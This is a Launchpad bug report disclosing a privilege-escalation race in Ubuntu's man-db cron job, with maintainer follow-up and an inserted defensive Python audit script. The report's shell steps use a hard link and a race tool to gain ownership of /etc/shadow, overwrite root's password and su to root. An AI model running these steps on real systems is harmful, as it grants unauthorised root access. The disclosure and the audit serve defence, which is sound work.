man-db daily cron job TOCTOU bug when processing catman pages
Affects | Status | Importance | Assigned to | Milestone
---|---|---|---|---
apport (Ubuntu) | Fix Released | Undecided | Unassigned |
man-db (Ubuntu) | Fix Released | High | Colin Watson |
pam (Ubuntu) | Confirmed | Undecided | Unassigned |
shadow (Ubuntu) | Confirmed | Undecided | Unassigned |
Bug Description
The daily mandb cleanup job for old catman pages changes the permissions of all non-man files to user man. The problematic code is:
# expunge old catman pages which have not been read in a week
if [ -d /var/cache/man ]; then
    cd /
    if ! dpkg-statoverride --list /var/cache/man >/dev/null 2>&1; then
        find /var/cache/man -ignore_
            xargs -r0 chown -f man || true
    fi
...
By creating a hard link and winning the race, user man may escalate privileges to user root. See [1] for full explanation.
man# mkdir -p /var/cache/man/etc
man# ln /var/crash/.lock /var/cache/
man# ./DirModifyInotify --Watch /var/cache/man/etc --WatchCount 0 --MovePath /var/cache/man/etc --LinkTarget /etc
... Wait till daily cronjob was run
man# cp /etc/shadow .
man# sed -r -e 's/^root:
man# cat x > /etc/shadow; rm x
man# su -s /bin/sh (password is 123)
root# cat shadow > /etc/shadow; chown root /etc/shadow
# lsb_release -rd
Description: Ubuntu 14.04.3 LTS
Release: 14.04
# apt-cache policy man-db
man-db:
Installed: 2.6.7.1-1ubuntu1
Candidate: 2.6.7.1-1ubuntu1
Version table:
*** 2.6.7.1-1ubuntu1 0
500 http://
100 /var/lib/
2.6.7.1-1 0
500 http://
[1] http://
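The race in the cron job comes from handing the path strings printed by find to a later chown, so a path component can be swapped for a symlink, or a file replaced by a hard link, between the two. As an added illustration (not man-db's code and not part of the report), the Python audit below walks a cache tree through held directory descriptors with O_NOFOLLOW, so every check applies to the object actually inspected, and it reports symlinked, hard-linked or foreign-owned entries instead of changing them; demo() builds a constructed temporary tree shaped like the report's layout.

```python
import os
import stat
import tempfile

def audit_tree(root, expected_uid):
    """Walk root via directory fds; return (path, reason) findings, change nothing."""
    findings = []
    fd = os.open(root, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW)
    try:
        _walk(fd, root, expected_uid, findings)
    finally:
        os.close(fd)
    return findings

def _walk(dir_fd, shown, expected_uid, findings):
    for name in os.listdir(dir_fd):
        path = os.path.join(shown, name)
        # lstat relative to the open directory: the path string is never re-resolved
        st = os.stat(name, dir_fd=dir_fd, follow_symlinks=False)
        if stat.S_ISLNK(st.st_mode):
            findings.append((path, "symlink"))          # e.g. a swapped-in directory symlink
        elif stat.S_ISDIR(st.st_mode):
            try:  # O_NOFOLLOW: if the entry became a symlink meanwhile, open fails (ELOOP)
                sub = os.open(name, os.O_RDONLY | os.O_DIRECTORY | os.O_NOFOLLOW, dir_fd=dir_fd)
            except OSError as exc:
                findings.append((path, "changed during walk: %s" % exc.strerror))
                continue
            try:
                _walk(sub, path, expected_uid, findings)
            finally:
                os.close(sub)
        else:
            if st.st_nlink > 1:   # hard link: a chown here would also affect the other name
                findings.append((path, "hard link (nlink=%d)" % st.st_nlink))
            if st.st_uid != expected_uid:
                findings.append((path, "owner uid %d" % st.st_uid))

def demo():
    """Constructed tree shaped like the report; returns {relative path: reason}."""
    base = tempfile.mkdtemp()
    cache = os.path.join(base, "cache")
    os.makedirs(os.path.join(cache, "etc"))
    outside = os.path.join(base, "lock")                     # stands in for /var/crash/.lock
    open(outside, "w").close()
    os.link(outside, os.path.join(cache, "etc", "shadow"))  # hard link into the cache
    open(os.path.join(cache, "cat1.gz"), "w").close()        # an ordinary cat page
    os.symlink(base, os.path.join(cache, "escape"))          # directory symlink out of the tree
    return {os.path.relpath(p, cache): r for p, r in audit_tree(cache, os.getuid())}

if __name__ == "__main__":
    for path, reason in sorted(demo().items()):
        print(path, "->", reason)
```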
information type: Private Security → Public Security
Changed in man-db (Ubuntu): importance: Undecided → Medium
Changed in apport (Ubuntu): status: Confirmed → Fix Committed
Changed in man-db (Ubuntu): status: Confirmed → Fix Committed
Changed in pam (Ubuntu): status: Confirmed → Fix Committed
Changed in shadow (Ubuntu): status: Confirmed → Fix Committed
Changed in apport (Ubuntu): status: Fix Committed → Confirmed
Changed in man-db (Ubuntu): status: Fix Committed → Confirmed
Changed in pam (Ubuntu): status: Fix Committed → Confirmed
Changed in shadow (Ubuntu): status: Fix Committed → Confirmed
Thanks Halfdog, this is as usual very interesting.
I think there are several issues here that should be addressed:
- apport's /var/crash/.lock should be set mode 600 instead of 777
- mandb should be rebuilt with ./configure --disable-cats
- the cronjobs and systemd tmp file handling should be removed
At least, I think it's time to remove the cat pages. They seem more trouble than they are worth. I'm not sure why the cronjob changes file ownership and I'm having trouble finding out why it would need to. So I'd rather remove it, and the reason for it to exist. Are there other mediation steps that we should take?
Removing the cat pages is a fairly large change but I'm not seeing smaller options that would address this without removing them. Are there any other smaller steps that I've overlooked?
Thanks